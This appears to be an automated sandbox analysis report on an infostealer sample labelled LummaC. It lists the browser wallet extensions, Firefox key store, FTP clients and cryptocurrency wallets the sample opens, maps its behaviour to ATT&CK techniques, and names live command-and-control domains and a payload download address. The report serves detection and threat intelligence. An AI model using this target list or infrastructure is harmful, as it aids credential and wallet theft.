        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5734.tmp.exeDirectory queried: number of queries: 1001
        Source: Yara matchFile source: 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 5734.tmp.exe PID: 3544, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: 5734.tmp.exe PID: 3544, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00661B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00661B33
        Source: C:\Users\user\Desktop\IH5XqCdf06.exeCode function: 0_2_00660E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00660E5D
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        12
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        4
        Obfuscated Files or Information
        LSASS Memory22
        File and Directory Discovery
        Remote Desktop Protocol41
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)Logon Script (Windows)22
        Software Packing
        Security Account Manager44
        System Information Discovery
        SMB/Windows Admin Shares1
        Screen Capture
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDS1
        Query Registry
        Distributed Component Object Model3
        Clipboard Data
        124
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets131
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection
        DCSync1
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        IH5XqCdf06.exe42%VirustotalBrowse
        IH5XqCdf06.exe53%ReversingLabsWin32.Trojan.Generic
        IH5XqCdf06.exe100%AviraHEUR/AGEN.1306978
        IH5XqCdf06.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\5734.tmp.exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Temp\5734.tmp.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exe53%ReversingLabsWin32.Exploit.LummaC
        C:\Users\user\AppData\Local\Temp\5734.tmp.exe53%ReversingLabsWin32.Exploit.LummaC
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://cloudewahsj.shop/7100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exeY0%Avira URL Cloudsafe
        https://post-to-me.com/track_prt.php?sub=0&cc=DEw100%Avira URL Cloudmalware
        https://cloudewahsj.shop/api100%Avira URL Cloudmalware
        https://cloudewahsj.shop/Y100%Avira URL Cloudmalware
        https://cloudewahsj.shop/apiR100%Avira URL Cloudmalware
        https://cloudewahsj.shop/apie-100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exeU0%Avira URL Cloudsafe
        https://cloudewahsj.shop/100%Avira URL Cloudmalware
        https://cloudewahsj.shop/G100%Avira URL Cloudmalware
        https://cloudewahsj.shop/apic100%Avira URL Cloudmalware
        https://cloudewahsj.shop/apiY100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        post-to-me.com
        104.21.56.70
        truefalse
          high
          cloudewahsj.shop
          104.21.96.1
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            rabidcowse.shopfalse
              high
              wholersorie.shopfalse
                high
                https://cloudewahsj.shop/apitrue
                • Avira URL Cloud: malware
                unknown
                cloudewahsj.shopfalse
                  high
                  noisycuttej.shopfalse
                    high
                    nearycrepso.shopfalse
                      high
                      https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                        high
                        framekgirus.shopfalse
                          high
                          tirepublicerj.shopfalse
                            high
                            abruptyopsn.shopfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://post-to-me.com/track_prt.php?sub=&cc=DEIH5XqCdf06.exe, 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtab5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://cloudewahsj.shop/75734.tmp.exe, 00000003.00000003.2196567061.00000000004C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://duckduckgo.com/ac/?q=5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://post-to-me.com/track_prt.php?sub=0&cc=DEwIH5XqCdf06.exe, 00000000.00000002.4569947875.0000000000713000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://cloudewahsj.shop/apiR5734.tmp.exe, 00000003.00000003.2237192063.0000000002E4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.rootca1.amazontrust.com/rootca1.crl05734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://176.113.115.19/ScreenUpdateSync.exeYIH5XqCdf06.exe, 00000000.00000002.4569947875.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://upx.sf.netAmcache.hve.6.drfalse
                                            high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://ocsp.rootca1.amazontrust.com0:5734.tmp.exe, 00000003.00000003.2223726935.0000000002F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.ecosia.org/newtab/5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br5734.tmp.exe, 00000003.00000003.2224835013.0000000003163000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cloudewahsj.shop/apie-5734.tmp.exe, 00000003.00000002.2291082783.00000000004C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://176.113.115.19/ScreenUpdateSync.exeIH5XqCdf06.exe, IH5XqCdf06.exe, 00000000.00000003.2159927093.0000000000762000.00000004.00000020.00020000.00000000.sdmp, IH5XqCdf06.exe, 00000000.00000002.4570218539.0000000000762000.00000004.00000020.00020000.00000000.sdmp, IH5XqCdf06.exe, 00000000.00000003.4437028090.0000000000762000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ac.ecosia.org/autocomplete?q=5734.tmp.exe, 00000003.00000003.2197783793.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197708002.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, 5734.tmp.exe, 00000003.00000003.2197876011.0000000002E89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWAREIH5XqCdf06.exe, 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                          high
                                                          https://post-to-me.com/track_prt.php?sub=IH5XqCdf06.exefalse
                                                            high
